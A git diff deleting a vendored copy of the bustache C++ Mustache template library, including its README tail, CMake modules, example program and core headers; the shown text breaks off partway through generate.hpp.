-inline std::basic_ostream<CharT, Traits>&
-operator<<(std::basic_ostream<CharT, Traits>& out, manipulator<T, Context> const& manip)
-```
-
-#### Example
-```c++
-// open the template file
-boost::iostreams::mapped_file_source file(...);
-// create format from source
-bustache::format format(file);
-// create the data we want to output
-bustache::object data{...};
-// create the context for Partials
-std::unordered_map<std::string, bustache::format> context{...};
-// output the result
-std::cout << format(data, context, bustache::escape_html);
-```
-Note that you can output anything that constitutes `bustache::value`, not just `bustache::object`.
-
-### String Output
-Generate a `std::string` from a `manipulator`.
-
-#### Synopsis
-```c++
-// in <bustache/model.hpp>
-template<class T, class Context,
-    std::enable_if_t<std::is_constructible<value::view, T>::value, bool> = true>
-inline std::string to_string(manipulator<T, Context> const& manip)
-```
-#### Example
-```c++
-bustache::format format(...);
-std::string txt = to_string(format(data, context, bustache::escape_html));
-```
-
-### Generate API
-`generate` can be used for customized output.
-
-#### Header
-`#include <bustache/generate.hpp>`
-
-```c++
-template<class Sink>
-inline void generate
-(
-    Sink& sink, format const& fmt, value::view const& data,
-    option_type flag = normal
-);
-
-template<class Sink, class Context>
-void generate
-(
-    Sink& sink, format const& fmt, value::view const& data,
-    Context const& context, option_type flag = normal
-);
-```
-`Sink` is a polymorphic functor that handles:
-```c++
-void operator()(char const* it, char const* end);
-void operator()(bool data);
-void operator()(int data);
-void operator()(double data);
-```
-You don't have to deal with HTML-escaping yourself, it's handled within `generate` depending on the option.
-
-### Predefined Generators
-These are predefined output built on `generate`.
-
-#### Header
-* `#include <bustache/generate/ostream.hpp>`
-* `#include <bustache/generate/string.hpp>`
-
-```c++
-template<class CharT, class Traits, class Context>
-void generate_ostream
-(
-    std::basic_ostream<CharT, Traits>& out, format const& fmt,
-    value::view const& data, Context const& context, option_type flag
-);
-
-template<class String, class Context>
-void generate_string
-(
-    String& out, format const& fmt,
-    value::view const& data, Context const& context, option_type flag
-);
-```
-
-#### Note
-The stream-based output and string output are built on these functions,
-but `<bustache/model.hpp>` doesn't include these headers and only supports `char` output,
-if you need other char-type support for stream/string output, you have to include these headers as well.
-
-
-## Advanced Topics
-### Lambdas
-The lambdas in {{ bustache }} have 4 variants - they're production of 2 param-set x 2 return-type.
-One param-set accepts no params, the other accepts a `bustache::ast::content_list const&`.
-One return-type is `bustache::value`, the other is `bustache::format`.
-
-Note that unlike other implementations, we pass a `bustache::ast::content_list` instead of a raw string.
-A `content_list` is a parsed list of AST nodes, you can make a new `content_list` out of the old one and give it to a `bustache::format`.
-
-### Error Handling
-The constructor of `bustache::format` may throw `bustache::format_error` if the parsing fails.
-```
-class format_error : public std::runtime_error
-{
-public:
-    explicit format_error(error_type err);
-
-    error_type code() const;
-};
-```
-`error_type` has these values:
-* error_set_delim
-* error_baddelim
-* error_delim
-* error_section
-* error_badkey
-
-You can also use `what()` for a descriptive text.
-
-## Performance
-Compare with 2 other libs - [mstch](https://github.com/no1msd/mstch) and [Kainjow.Mustache](https://github.com/kainjow/Mustache).
-See [benchmark.cpp](test/benchmark.cpp). 
-
-Sample run (VS2015 Update 3, boost 1.60.0, 64-bit release build):
-```
-Benchmark               Time           CPU Iterations
------------------------------------------------------
-bustache_usage       6325 ns       6397 ns     112179
-mstch_usage        140822 ns     140795 ns       4986
-kainjow_usage       47354 ns      47420 ns      14475
-```
-Lower is better.
-
-![benchmark](doc/benchmark.png?raw=true)
-
-## License
-
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-
-<!-- Links -->
-[badge.Wandbox]: https://img.shields.io/badge/try%20it-online-green.svg
diff --git a/thirdparty/bustache/cmake/FindCatch.cmake b/thirdparty/bustache/cmake/FindCatch.cmake
deleted file mode 100644
index f5c2e7d..0000000
--- a/thirdparty/bustache/cmake/FindCatch.cmake
+++ /dev/null
@@ -1,13 +0,0 @@
-find_path(
-	CATCH_INCLUDE_DIR 
-	NAMES catch.hpp
-)
-
-set(CATCH_INCLUDE_DIRS ${CATCH_INCLUDE_DIR})
-
-include(FindPackageHandleStandardArgs)
-
-find_package_handle_standard_args(Catch DEFAULT_MSG
-	CATCH_INCLUDE_DIR)
-
-mark_as_advanced (CATCH_INCLUDE_DIR)
\ No newline at end of file
diff --git a/thirdparty/bustache/cmake/Modules/FindCatch.cmake b/thirdparty/bustache/cmake/Modules/FindCatch.cmake
deleted file mode 100644
index e596841..0000000
--- a/thirdparty/bustache/cmake/Modules/FindCatch.cmake
+++ /dev/null
@@ -1,14 +0,0 @@
-find_path(
-	CATCH_INCLUDE_DIR 
-	NAMES catch.hpp
-	DOC "catch include dir"
-)
-
-set(CATCH_INCLUDE_DIRS ${CATCH_INCLUDE_DIR})
-
-include(FindPackageHandleStandardArgs)
-
-find_package_handle_standard_args(Catch DEFAULT_MSG
-	CATCH_INCLUDE_DIR)
-
-mark_as_advanced (CATCH_INCLUDE_DIR)
\ No newline at end of file
diff --git a/thirdparty/bustache/doc/benchmark.png b/thirdparty/bustache/doc/benchmark.png
deleted file mode 100644
index e69de29..0000000
--- a/thirdparty/bustache/doc/benchmark.png
+++ /dev/null
diff --git a/thirdparty/bustache/example/in.mustache b/thirdparty/bustache/example/in.mustache
deleted file mode 100644
index 996db4f..0000000
--- a/thirdparty/bustache/example/in.mustache
+++ /dev/null
@@ -1,39 +0,0 @@
-<h1>{{header}}</h1>
-{{#bug}}
-{{/bug}}
-
-{{# items}}
-  {{#first}}
-    <li><strong>{{name}}</strong></li>
-  {{/first}}
-  {{#link}}
-    <li><a {{>href}}>{{name}}</a></li>
-  {{/link}}
-{{ /items}}
-
-{{#empty}}
-  <p>The list is empty.</p>
-{{/ empty }}
-
-{{=[ ]=}}
-
-[#array]([.])[/array]
-
-[#items]
-[count]->[count]->[count]
-[/items]
-
-[a.b.c] == [#a][#b][c][/b][/a]
-
-<div class="comments">
-    <h3>[header]</h3>
-    <ul>
-        [#comments]
-        <li class="comment">
-            <h5>[name]</h5>
-            <p>[body]</p>
-        </li>
-        <!--[count]-->
-        [/comments]
-    </ul>
-</div>
\ No newline at end of file
diff --git a/thirdparty/bustache/example/main.cpp b/thirdparty/bustache/example/main.cpp
deleted file mode 100644
index 4a7aea6..0000000
--- a/thirdparty/bustache/example/main.cpp
+++ /dev/null
@@ -1,82 +0,0 @@
-#include <iostream>
-#include <bustache/model.hpp>
-#include <boost/iostreams/device/mapped_file.hpp>
-
-int main()
-{
-    using bustache::object;
-    using bustache::array;
-    using namespace bustache::literals;
-
-    boost::unordered_map<std::string, bustache::format> context
-    {
-        {"href", "href=\"{{url}}\""_fmt}
-    };
-
-    int n = 0;
-    object data
-    {
-        {"header", "Colors"},
-        {"items",
-            array
-            {
-                object
-                {
-                    {"name", "red"},
-                    {"first", true},
-                    {"url", "#Red"}
-                },
-                object
-                {
-                    {"name", "green"},
-                    {"link", true},
-                    {"url", "#Green"}
-                },
-                object
-                {
-                    {"name", "blue"},
-                    {"link", true},
-                    {"url", "#Blue"}
-                }
-            }
-        },
-        {"empty", false},
-        {"count", [&n] { return ++n; }},
-        {"array", array{1, 2, 3}},
-        {"a", object{{"b", object{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                object
-                {
-                    {"name", "Joe"},
-                    {"body", "<html> should be escaped"}
-                },
-                object
-                {
-                    {"name", "Sam"},
-                    {"body", "{{mustache}} can be seen"}
-                },
-                object
-                {
-                    {"name", "New"},
-                    {"body", "break\nup"}
-                }
-            }
-        }
-    };
-
-    try
-    {
-        boost::iostreams::mapped_file_source file("in.mustache");
-        bustache::format format(file);
-        std::cout << "-----------------------\n";
-        std::cout << format(data, context, bustache::escape_html) << "\n";
-        std::cout << "-----------------------\n";
-    }
-    catch (const std::exception& e)
-    {
-        std::cerr << e.what();
-    }
-    return 0;
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/ast.hpp b/thirdparty/bustache/include/bustache/ast.hpp
deleted file mode 100644
index 94e142e..0000000
--- a/thirdparty/bustache/include/bustache/ast.hpp
+++ /dev/null
@@ -1,86 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_AST_HPP_INCLUDED
-#define BUSTACHE_AST_HPP_INCLUDED
-
-#include <bustache/detail/variant.hpp>
-#include <boost/utility/string_ref.hpp>
-#include <boost/unordered_map.hpp>
-#include <vector>
-#include <string>
-
-namespace bustache { namespace ast
-{
-    struct variable;
-    struct section;
-    class content;
-
-    using text = boost::string_ref;
-
-    using content_list = std::vector<content>;
-
-    using override_map = boost::unordered_map<std::string, content_list>;
-
-    struct null {};
-
-    struct variable
-    {
-        std::string key;
-        char tag = '\0';
-#ifdef _MSC_VER // Workaround MSVC bug.
-        variable() = default;
-
-        explicit variable(std::string key, char tag = '\0')
-          : key(std::move(key)), tag(tag)
-        {}
-#endif
-    };
-
-    struct block
-    {
-        std::string key;
-        content_list contents;
-    };
-
-    struct section : block
-    {
-        char tag = '#';
-    };
-
-    struct partial
-    {
-        std::string key;
-        std::string indent;
-        override_map overriders;
-    };
-
-#define BUSTACHE_AST_CONTENT(X, D)                                              \
-    X(0, null, D)                                                               \
-    X(1, text, D)                                                               \
-    X(2, variable, D)                                                           \
-    X(3, section, D)                                                            \
-    X(4, partial, D)                                                            \
-    X(5, block, D)                                                              \
-/***/
-
-    class content : public variant_base<content>
-    {
-        BUSTACHE_AST_CONTENT(Zz_BUSTACHE_VARIANT_MATCH,)
-    public:
-        Zz_BUSTACHE_VARIANT_DECL(content, BUSTACHE_AST_CONTENT, true)
-
-        content() noexcept : _which(0), _0() {}
-    };
-#undef BUSTACHE_AST_CONTENT
-
-    inline bool is_null(content const& c)
-    {
-        return !c.which();
-    }
-}}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/debug.hpp b/thirdparty/bustache/include/bustache/debug.hpp
deleted file mode 100644
index 1235361..0000000
--- a/thirdparty/bustache/include/bustache/debug.hpp
+++ /dev/null
@@ -1,92 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DEBUG_HPP_INCLUDED
-#define BUSTACHE_DEBUG_HPP_INCLUDED
-
-#include <iostream>
-#include <iomanip>
-#include <bustache/format.hpp>
-
-namespace bustache { namespace detail
-{
-    template<class CharT, class Traits>
-    struct ast_printer
-    {
-        std::basic_ostream<CharT, Traits>& out;
-        unsigned level;
-        unsigned const space;
-
-        void operator()(ast::text const& text) const
-        {
-            indent();
-            auto i = text.begin();
-            auto i0 = i;
-            auto e = text.end();
-            out << "text: \"";
-            while (i != e)
-            {
-                char const* esc = nullptr;
-                switch (*i)
-                {
-                case '\r': esc = "\\r"; break;
-                case '\n': esc = "\\n"; break;
-                case '\\': esc = "\\\\"; break;
-                default: ++i; continue;
-                }
-                out.write(i0, i - i0);
-                i0 = ++i;
-                out << esc;
-            }
-            out.write(i0, i - i0);
-            out << "\"\n";
-        }
-
-        void operator()(ast::variable const& variable) const
-        {
-            indent();
-            out << "variable";
-            if (variable.tag)
-                out << "(&)";
-            out << ": " << variable.key << "\n";
-        }
-
-        void operator()(ast::section const& section)
-        {
-            out;
-            out << "section(" << section.tag << "): " << section.key << "\n";
-            ++level;
-            for (auto const& content : section.contents)
-                apply_visitor(*this, content);
-            --level;
-        }
-
-        void operator()(ast::partial const& partial) const
-        {
-            out << "partial: " << partial.key << "\n";
-        }
-
-        void operator()(ast::null) const {} // never called
-
-        void indent() const
-        {
-            out << std::setw(space * level) << "";
-        }
-    };
-}}
-
-namespace bustache
-{
-    template<class CharT, class Traits>
-    inline void print_ast(std::basic_ostream<CharT, Traits>& out, format const& fmt, unsigned indent = 4)
-    {
-        detail::ast_printer<CharT, Traits> visitor{out, 0, indent};
-        for (auto const& content : fmt.contents())
-            apply_visitor(visitor, content);
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/detail/any_context.hpp b/thirdparty/bustache/include/bustache/detail/any_context.hpp
deleted file mode 100644
index 78bf207..0000000
--- a/thirdparty/bustache/include/bustache/detail/any_context.hpp
+++ /dev/null
@@ -1,55 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DETAIL_ANY_CONTEXT_HPP_INCLUDED
-#define BUSTACHE_DETAIL_ANY_CONTEXT_HPP_INCLUDED
-
-#include <string>
-#include <utility>
-
-namespace bustache
-{
-    struct format;
-}
-
-namespace bustache { namespace detail
-{
-    struct any_context
-    {
-        using value_type = std::pair<std::string const, format>;
-        using iterator = value_type const*;
-
-        template<class Context>
-        any_context(Context const& context) noexcept
-            : _data(&context), _find(find_fn<Context>)
-        {}
-
-        iterator find(std::string const& key) const
-        {
-            return _find(_data, key);
-        }
-
-        iterator end() const
-        {
-            return nullptr;
-        }
-
-    private:
-
-        template<class Context>
-        static value_type const* find_fn(void const* data, std::string const& key)
-        {
-            auto ctx = static_cast<Context const*>(data);
-            auto it = ctx->find(key);
-            return it != ctx->end() ? &*it : nullptr;
-        }
-
-        void const* _data;
-        value_type const* (*_find)(void const*, std::string const&);
-    };
-}}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/detail/variant.hpp b/thirdparty/bustache/include/bustache/detail/variant.hpp
deleted file mode 100644
index 50c6c66..0000000
--- a/thirdparty/bustache/include/bustache/detail/variant.hpp
+++ /dev/null
@@ -1,362 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_DETAIL_VARIANT_HPP_INCLUDED
-#define BUSTACHE_DETAIL_VARIANT_HPP_INCLUDED
-
-#include <cassert>
-#include <cstdlib>
-#include <utility>
-#include <stdexcept>
-#include <type_traits>
-
-namespace bustache { namespace detail
-{
-    template<class T>
-    inline T& cast(void* data)
-    {
-        return *static_cast<T*>(data);
-    }
-
-    template<class T>
-    inline T const& cast(void const* data)
-    {
-        return *static_cast<T const*>(data);
-    }
-
-    template<class T, class U>
-    struct noexcept_ctor_assign
-    {
-        static constexpr bool value =
-            std::is_nothrow_constructible<T, U>::value &&
-            std::is_nothrow_assignable<T, U>::value;
-    };
-
-    struct ctor_visitor
-    {
-        using result_type = void;
-
-        void* data;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            new(data) T(std::move(t));
-        }
-
-        template<class T>
-        void operator()(T const& t) const
-        {
-            new(data) T(t);
-        }
-    };
-
-    struct assign_visitor
-    {
-        using result_type = void;
-
-        void* data;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            *static_cast<T*>(data) = std::move(t);
-        }
-
-        template<class T>
-        void operator()(T const& t) const
-        {
-            *static_cast<T*>(data) = t;
-        }
-    };
-
-    struct dtor_visitor
-    {
-        using result_type = void;
-
-        template<class T>
-        void operator()(T& t) const
-        {
-            t.~T();
-        }
-    };
-
-    template<class T>
-    struct type {};
-}}
-
-namespace bustache
-{
-    template<class T>
-    struct variant_base {};
-
-    template<class View>
-    struct variant_ptr
-    {
-        variant_ptr() noexcept : _data() {}
-
-        variant_ptr(std::nullptr_t) noexcept : _data() {}
-
-        variant_ptr(unsigned which, void const* data) noexcept
-            : _which(which), _data(data)
-        {}
-
-        explicit operator bool() const
-        {
-            return !!_data;
-        }
-
-        View operator*() const
-        {
-            return{_which, _data};
-        }
-
-        unsigned which() const
-        {
-            return _which;
-        }
-
-        void const* data() const
-        {
-            return _data;
-        }
-
-    private:
-
-        unsigned _which;
-        void const* _data;
-    };
-
-    class bad_variant_access : public std::exception
-    {
-    public:
-        bad_variant_access() noexcept {}
-
-        const char* what() const noexcept override
-        {
-            return "bustache::bad_variant_access";
-        }
-    };
-    
-    template<class Visitor, class Var>
-    inline auto visit(Visitor&& visitor, variant_base<Var>& v) ->
-        decltype(Var::switcher::common_ret((void*)nullptr, visitor))
-    {
-        auto& var = static_cast<Var&>(v);
-        return Var::switcher::visit(var.which(), var.data(), visitor);
-    }
-
-    template<class Visitor, class Var>
-    inline auto visit(Visitor&& visitor, variant_base<Var> const& v) ->
-        decltype(Var::switcher::common_ret((void const*)nullptr, visitor))
-    {
-        auto& var = static_cast<Var const&>(v);
-        return Var::switcher::visit(var.which(), var.data(), visitor);
-    }
-
-    // Synomym of visit (for Boost.Variant compatibility)
-    template<class Visitor, class Var>
-    inline auto apply_visitor(Visitor&& visitor, variant_base<Var>& v) ->
-        decltype(Var::switcher::common_ret((void*)nullptr, visitor))
-    {
-        return visit(std::forward<Visitor>(visitor), v);
-    }
-
-    template<class Visitor, class Var>
-    inline auto apply_visitor(Visitor&& visitor, variant_base<Var> const& v) ->
-        decltype(Var::switcher::common_ret((void const*)nullptr, visitor))
-    {
-        return visit(std::forward<Visitor>(visitor), v);
-    }
-
-    template<class T, class Var>
-    inline T& get(variant_base<Var>& v)
-    {
-        auto& var = static_cast<Var&>(v);
-        if (Var::switcher::index(detail::type<T>{}) == var.which())
-            return *static_cast<T*>(var.data());
-        throw bad_variant_access();
-    }
-
-    template<class T, class Var>
-    inline T const& get(variant_base<Var> const& v)
-    {
-        auto& var = static_cast<Var const&>(v);
-        if (Var::switcher::index(detail::type<T>{}) == var.which())
-            return *static_cast<T const*>(var.data());
-        throw bad_variant_access();
-    }
-
-    template<class T, class Var>
-    inline T* get(variant_base<Var>* vp)
-    {
-        if (vp)
-        {
-            auto v = static_cast<Var*>(vp);
-            if (Var::switcher::index(detail::type<T>{}) == v->which())
-                return static_cast<T*>(v->data());
-        }
-        return nullptr;
-    }
-
-    template<class T, class Var>
-    inline T const* get(variant_base<Var> const* vp)
-    {
-        if (vp)
-        {
-            auto v = static_cast<Var const*>(vp);
-            if (Var::switcher::index(detail::type<T>{}) == v->which())
-                return static_cast<T const*>(v->data());
-        }
-        return nullptr;
-    }
-
-    template<class T, class Var>
-    inline T const* get(variant_ptr<Var> const& vp)
-    {
-        if (vp)
-        {
-            if (Var::switcher::index(detail::type<T>{}) == vp.which())
-                return static_cast<T const*>(vp.data());
-        }
-        return nullptr;
-    }
-}
-
-#define Zz_BUSTACHE_UNREACHABLE(MSG) { assert(!MSG); std::abort(); }
-#define Zz_BUSTACHE_VARIANT_SWITCH(N, U, D) case N: return v(detail::cast<U>(data));
-#define Zz_BUSTACHE_VARIANT_RET(N, U, D) true ? v(detail::cast<U>(data)) :
-#define Zz_BUSTACHE_VARIANT_MEMBER(N, U, D) U _##N;
-#define Zz_BUSTACHE_VARIANT_CTOR(N, U, D)                                       \
-D(U val) noexcept : _which(N), _##N(std::move(val)) {}
-/***/
-#define Zz_BUSTACHE_VARIANT_INDEX(N, U, D)                                      \
-static constexpr unsigned index(detail::type<U>) { return N; }                  \
-/***/
-#define Zz_BUSTACHE_VARIANT_MATCH(N, U, D) static U match_type(U);
-#define Zz_BUSTACHE_VARIANT_DECL(VAR, TYPES, NOEXCPET)                          \
-struct switcher                                                                 \
-{                                                                               \
-    template<class T, class Visitor>                                            \
-    static auto common_ret(T* data, Visitor& v) ->                              \
-        decltype(TYPES(Zz_BUSTACHE_VARIANT_RET,) throw bad_variant_access());   \
-    template<class T, class Visitor>                                            \
-    static auto visit(unsigned which, T* data, Visitor& v) ->                   \
-        decltype(common_ret(data, v))                                           \
-    {                                                                           \
-        switch (which)                                                          \
-        {                                                                       \
-        TYPES(Zz_BUSTACHE_VARIANT_SWITCH,)                                      \
-        default: throw bad_variant_access();                                    \
-        }                                                                       \
-    }                                                                           \
-    TYPES(Zz_BUSTACHE_VARIANT_INDEX,)                                           \
-};                                                                              \
-private:                                                                        \
-unsigned _which;                                                                \
-union                                                                           \
-{                                                                               \
-    char _storage[1];                                                           \
-    TYPES(Zz_BUSTACHE_VARIANT_MEMBER,)                                          \
-};                                                                              \
-void invalidate()                                                               \
-{                                                                               \
-    if (valid())                                                                \
-    {                                                                           \
-        detail::dtor_visitor v;                                                 \
-        switcher::visit(_which, data(), v);                                     \
-        _which = ~0u;                                                           \
-    }                                                                           \
-}                                                                               \
-template<class T>                                                               \
-void do_init(T& other)                                                          \
-{                                                                               \
-    detail::ctor_visitor v{_storage};                                           \
-    switcher::visit(other._which, other.data(), v);                             \
-}                                                                               \
-template<class T>                                                               \
-void do_assign(T& other)                                                        \
-{                                                                               \
-    if (_which == other._which)                                                 \
-    {                                                                           \
-        detail::assign_visitor v{_storage};                                     \
-        switcher::visit(other._which, other.data(), v);                         \
-    }                                                                           \
-    else                                                                        \
-    {                                                                           \
-        invalidate();                                                           \
-        if (other.valid())                                                      \
-        {                                                                       \
-            do_init(other);                                                     \
-            _which = other._which;                                              \
-        }                                                                       \
-    }                                                                           \
-}                                                                               \
-public:                                                                         \
-unsigned which() const                                                          \
-{                                                                               \
-    return _which;                                                              \
-}                                                                               \
-bool valid() const                                                              \
-{                                                                               \
-    return _which != ~0u;                                                       \
-}                                                                               \
-void* data()                                                                    \
-{                                                                               \
-    return _storage;                                                            \
-}                                                                               \
-void const* data() const                                                        \
-{                                                                               \
-    return _storage;                                                            \
-}                                                                               \
-VAR(VAR&& other) noexcept(NOEXCPET) : _which(other._which)                      \
-{                                                                               \
-    do_init(other);                                                             \
-}                                                                               \
-VAR(VAR const& other) : _which(other._which)                                    \
-{                                                                               \
-    do_init(other);                                                             \
-}                                                                               \
-template<class T, class U = decltype(match_type(std::declval<T>()))>            \
-VAR(T&& other) noexcept(std::is_nothrow_constructible<U, T>::value)             \
-  : _which(switcher::index(detail::type<U>{}))                                  \
-{                                                                               \
-    new(_storage) U(std::forward<T>(other));                                    \
-}                                                                               \
-~VAR()                                                                          \
-{                                                                               \
-    if (valid())                                                                \
-    {                                                                           \
-        detail::dtor_visitor v;                                                 \
-        switcher::visit(_which, data(), v);                                     \
-    }                                                                           \
-}                                                                               \
-template<class T, class U = decltype(match_type(std::declval<T>()))>            \
-U& operator=(T&& other) noexcept(detail::noexcept_ctor_assign<U, T>::value)     \
-{                                                                               \
-    if (switcher::index(detail::type<U>{}) == _which)                           \
-        return *static_cast<U*>(data()) = std::forward<T>(other);               \
-    else                                                                        \
-    {                                                                           \
-        invalidate();                                                           \
-        auto p = new(_storage) U(std::forward<T>(other));                       \
-        _which = switcher::index(detail::type<U>{});                            \
-        return *p;                                                              \
-    }                                                                           \
-}                                                                               \
-VAR& operator=(VAR&& other) noexcept(NOEXCPET)                                  \
-{                                                                               \
-    do_assign(other);                                                           \
-    return *this;                                                               \
-}                                                                               \
-VAR& operator=(VAR const& other)                                                \
-{                                                                               \
-    do_assign(other);                                                           \
-    return *this;                                                               \
-}                                                                               \
-/***/
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/format.hpp b/thirdparty/bustache/include/bustache/format.hpp
deleted file mode 100644
index dd07740..0000000
--- a/thirdparty/bustache/include/bustache/format.hpp
+++ /dev/null
@@ -1,158 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2014-2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_FORMAT_HPP_INCLUDED
-#define BUSTACHE_FORMAT_HPP_INCLUDED
-
-#include <bustache/ast.hpp>
-#include <stdexcept>
-#include <memory>
-
-namespace bustache
-{
-    struct format;
-    
-    using option_type = bool;
-    constexpr option_type normal = false;
-    constexpr option_type escape_html = true;
-
-    template<class T, class Context>
-    struct manipulator
-    {
-        format const& fmt;
-        T const& data;
-        Context const& context;
-        option_type const flag;
-    };
-
-    struct no_context
-    {
-        using value_type = std::pair<std::string const, format>;
-        using iterator = value_type const*;
-        
-        constexpr iterator find(std::string const&) const
-        {
-            return nullptr;
-        }
-        
-        constexpr iterator end() const
-        {
-            return nullptr;
-        }
-
-        static no_context const& dummy()
-        {
-            static no_context const _{};
-            return _;
-        }
-    };
-
-    enum error_type
-    {
-        error_set_delim,
-        error_baddelim,
-        error_delim,
-        error_section,
-        error_badkey
-    };
-
-    class format_error : public std::runtime_error
-    {
-        error_type _err;
-
-    public:
-        explicit format_error(error_type err);
-
-        error_type code() const
-        {
-            return _err;
-        }
-    };
-    
-    struct format
-    {
-        format() = default;
-
-        format(char const* begin, char const* end)
-        {
-            init(begin, end);
-        }
-        
-        template<class Source>
-        explicit format(Source const& source)
-        {
-            init(source.data(), source.data() + source.size());
-        }
-        
-        template<class Source>
-        explicit format(Source const&& source)
-        {
-            init(source.data(), source.data() + source.size());
-            copy_text(text_size());
-        }
-
-        template<std::size_t N>
-        explicit format(char const (&source)[N])
-        {
-            init(source, source + (N - 1));
-        }
-
-        explicit format(ast::content_list contents, bool copytext = true)
-          : _contents(std::move(contents))
-        {
-            if (copytext)
-                copy_text(text_size());
-        }
-
-        format(format&& other) noexcept
-          : _contents(std::move(other._contents)), _text(std::move(other._text))
-        {}
-
-        format(format const& other) : _contents(other._contents)
-        {
-            if (other._text)
-                copy_text(text_size());
-        }
-
-        template<class T>
-        manipulator<T, no_context>
-        operator()(T const& data, option_type flag = normal) const
-        {
-            return {*this, data, no_context::dummy(), flag};
-        }
-        
-        template<class T, class Context>
-        manipulator<T, Context>
-        operator()(T const& data, Context const& context, option_type flag = normal) const
-        {
-            return {*this, data, context, flag};
-        }
-        
-        ast::content_list const& contents() const
-        {
-            return _contents;
-        }
-        
-    private:
-        
-        void init(char const* begin, char const* end);
-        std::size_t text_size() const;
-        void copy_text(std::size_t n);
-
-        ast::content_list _contents;
-        std::unique_ptr<char[]> _text;
-    };
-
-    inline namespace literals
-    {
-        inline format operator"" _fmt(char const* str, std::size_t n)
-        {
-            return format(str, str + n);
-        }
-    }
-}
-
-#endif
\ No newline at end of file
diff --git a/thirdparty/bustache/include/bustache/generate.hpp b/thirdparty/bustache/include/bustache/generate.hpp
deleted file mode 100644
index 65a6491..0000000
--- a/thirdparty/bustache/include/bustache/generate.hpp
+++ /dev/null
@@ -1,430 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#ifndef BUSTACHE_GENERATE_HPP_INCLUDED
-#define BUSTACHE_GENERATE_HPP_INCLUDED
-
-#include <bustache/model.hpp>
-
-namespace bustache { namespace detail
-{
-    inline value::pointer find(object const& data, std::string const& key)
-    {
-        auto it = data.find(key);
-        if (it != data.end())
-            return it->second.get_pointer();
-        return nullptr;
-    }
-
-    template<class Sink>
-    struct value_printer
-    {
-        typedef void result_type;
-        
-        Sink const& sink;
-        bool const escaping;
-
-        void operator()(std::nullptr_t) const {}
-        
-        template<class T>
-        void operator()(T data) const
-        {
-            sink(data);
-        }
-
-        void operator()(std::string const& data) const
-        {
-            auto it = data.data(), end = it + data.size();
-            if (escaping)
-                escape_html(it, end);
-            else
-                sink(it, end);
-        }
-        
-        void operator()(array const& data) const
-        {
-            auto it = data.begin(), end = data.end();
-            if (it != end)
-            {
-                visit(*this, *it);
-                while (++it != end)
-                {
-                    literal(",");
-                    visit(*this, *it);
-                }
-            }
-        }
-
-        void operator()(object const&) const
-        {
-            literal("[Object]");
-        }
-
-        void operator()(lambda0v const& data) const
-        {
-            visit(*this, data());
-        }
-
-        void operator()(lambda1v const& data) const
-        {
-            visit(*this, data({}));
-        }
-
-        template<class Sig>
-        void operator()(std::function<Sig> const&) const
-        {
-            literal("[Function]");
-        }
-
-        void escape_html(char const* it, char const* end) const
-        {
-            char const* last = it;
-            while (it != end)
-            {
-                switch (*it)
-                {
-                case '&': sink(last, it); literal("&amp;"); break;
-                case '<': sink(last, it); literal("&lt;"); break;
-                case '>': sink(last, it); literal("&gt;"); break;
-                case '\\': sink(last, it); literal("&#92;"); break;
-                case '"': sink(last, it); literal("&quot;"); break;
-                default:  ++it; continue;
-                }
-                last = ++it;
-            }
-            sink(last, it);
-        }
-
-        template<std::size_t N>
-        void literal(char const (&str)[N]) const
-        {
-            sink(str, str + (N - 1));
-        }
-    };
-
-    struct content_scope
-    {
-        content_scope const* const parent;
-        object const& data;
-
-        value::pointer lookup(std::string const& key) const
-        {
-            if (auto pv = find(data, key))
-                return pv;
-            if (parent)
-                return parent->lookup(key);
-            return nullptr;
-        }
-    };
-
-    struct content_visitor_base
-    {
-        using result_type = void;
-
-        content_scope const* scope;
-        value::pointer cursor;
-        std::vector<ast::override_map const*> chain;
-        mutable std::string key_cache;
-
-        // Defined in src/generate.cpp.
-        value::pointer resolve(std::string const& key) const;
-
-        ast::content_list const* find_override(std::string const& key) const
-        {
-            for (auto pm : chain)
-            {
-                auto it = pm->find(key);
-                if (it != pm->end())
-                    return &it->second;
-            }
-            return nullptr;
-        }
-    };
-
-    template<class ContentVisitor>
